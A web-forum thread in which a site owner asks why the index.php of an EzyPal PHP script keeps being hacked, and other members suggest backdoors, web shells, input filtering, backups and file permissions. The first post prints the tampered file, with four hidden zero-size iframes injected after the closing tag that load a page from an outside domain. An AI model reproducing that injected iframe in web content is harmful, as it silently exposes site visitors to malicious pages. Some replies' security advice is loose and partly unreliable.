1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

EzyPal Hacking

Discussion in 'PHP & Perl' started by olimpiu_stefan, Dec 5, 2009.

  1. olimpiu_stefan

    olimpiu_stefan BANNED BANNED

    Joined:
    Jul 2, 2008
    Messages:
    94
    Likes Received:
    70
    Hi guys. I have ONE big problem.

    For the guys who use ezypal script:

    I was hacked for 5 times. And the file that was modified is index.php.

    Like this:

    PHP:
    <?php


    error_reporting
    (E_ERROR);

    define("EZY_VALID",true);

    require_once(
    'includes/configuration.php');
    require_once(
    'includes/error.php');
    require_once(
    'includes/mysql.php');
    require_once(
    'includes/compatibility.php');
    require_once(
    'includes/vars.php');
    require_once(
    'includes/functions.php');
    require_once(
    'includes/mail.php');

    if(
    ini_get('safe_mode')=='Off'ini_set('magic_quotes_gpc',1);

    if(
    $config['store_active']=='true'||SessionLevel()==2) {
        if(isset(
    $_GET['do'])) $action $_GET['do'];
        else 
    $action 'home';
        
        if(
    $action!='file') {
            
    ob_start();
            include(
    'includes/template.php');
            
    ob_end_flush();
        }
        else include(
    'file.php');
    }
    else include(
    'offline.html');

    require_once(
    'includes/final.php');

    //=====================[ EZYPAL IS NOT FREE SOFTWARE ]======================//
    ?><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    In the footer thay put IFRAME.

    Please how can i resolve this problem?
    But PLEASE dont tell me to buy'it.

    Thanks
     
  2. cyklotrial

    cyklotrial Regular Member

    Joined:
    Oct 13, 2008
    Messages:
    248
    Likes Received:
    82
    Location:
    Wonderland
    If i'ts nulled script propably you have backdor in one (or more) file.
    You have to find it and remove.

    to find it you should check your server logs
     
  3. Crooker

    Crooker Newbie

    Joined:
    Jun 1, 2009
    Messages:
    0
    Likes Received:
    483
    There are loads of ways your site might get hacked.
    First there are some variables that have little to do with your own website for instance;

    *vunerablity of your home pc/ no proper updated virus scanners. Think key loggers, infected ftp software, browser hacks
    *Shared hosting. Maybe the vulnerability is not with you but with your neighbor on the server. A hacked site isn't necessarily a scripting issue.

    Then there are also some other factors that come to play.
    Script vulnerabilities. Be it via php vulnerability or scripting errors.
    To prevent XSS
    Simple things to protect yourself is to filter out any symbols from text input.
    Can easily be done by using preg_replace and the symbols with nothing or just return a error message to the user saying symbols are not allowed.
    Second is to encode input to sql and decode on output. That way the code can never become active inside because its scrambled.
    PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods;
    Code:
    http://www.php.net/manual/en/function.escapeshellarg.php
    Code:
    http://www.php.net/manual/en/function.escapeshellcmd.php
    Ones a shell is intstalled it will change your files inputting for instance an iframe which you had.
    When you remove the iframe you haven't removed the shell so when you continue, the shell is also going to continue it's work and the iframe will keep on coming back.
    There are lots of tutorials you can find via google on how to remove one.
    Or on how to find one in the first place.


    Another thing php is flawed with is that it is very vulnerable when exposed to the public directly.
    For instance index.php.
    A way to work around this is to not allow acces to the core php files.
    But then logically no one would have access to your site.
    You can generate html or xml files from your php core affectively making a html mirror of the php file.
    This has a few advantages. Your site load will be lighter and your page will be faster because it doesn't have to load any sql data.
    Plus its very hard to hack due to it's pure simplistic nature, you limit the hackers possibilities to a few parameters that are easy for you to controle.
    See the image for an example on how it works

    [​IMG]

    You can even generate php file from your core folder. So you can refresh a script each morning or a certain file everytime someone has made a comment.

    You can do any of the above or not but there is still something that you must do regardless and that is; "Make Backups"!
     
    • Thanks Thanks x 1
  4. Crooker

    Crooker Newbie

    Joined:
    Jun 1, 2009
    Messages:
    0
    Likes Received:
    483
    olimpiu_stefan

    I may have a solution to your problem, PM me.
     
    Last edited: Dec 6, 2009
  5. shanelee

    shanelee Newbie

    Joined:
    Dec 23, 2015
    Messages:
    6
    Likes Received:
    0
    I am looking for better threads about hacking. I am a noob on this. Can anyone help?
     
  6. revproxy

    revproxy BANNED BANNED Jr. VIP Premium Member

    Joined:
    Nov 20, 2015
    Messages:
    396
    Likes Received:
    100
    Gender:
    Male
    remove write permission from your files, use:
    chmod 644
     
  7. phpdevsami

    phpdevsami Newbie

    Joined:
    Dec 31, 2015
    Messages:
    13
    Likes Received:
    1
    Gender:
    Male
    Home Page:
    Disable writing.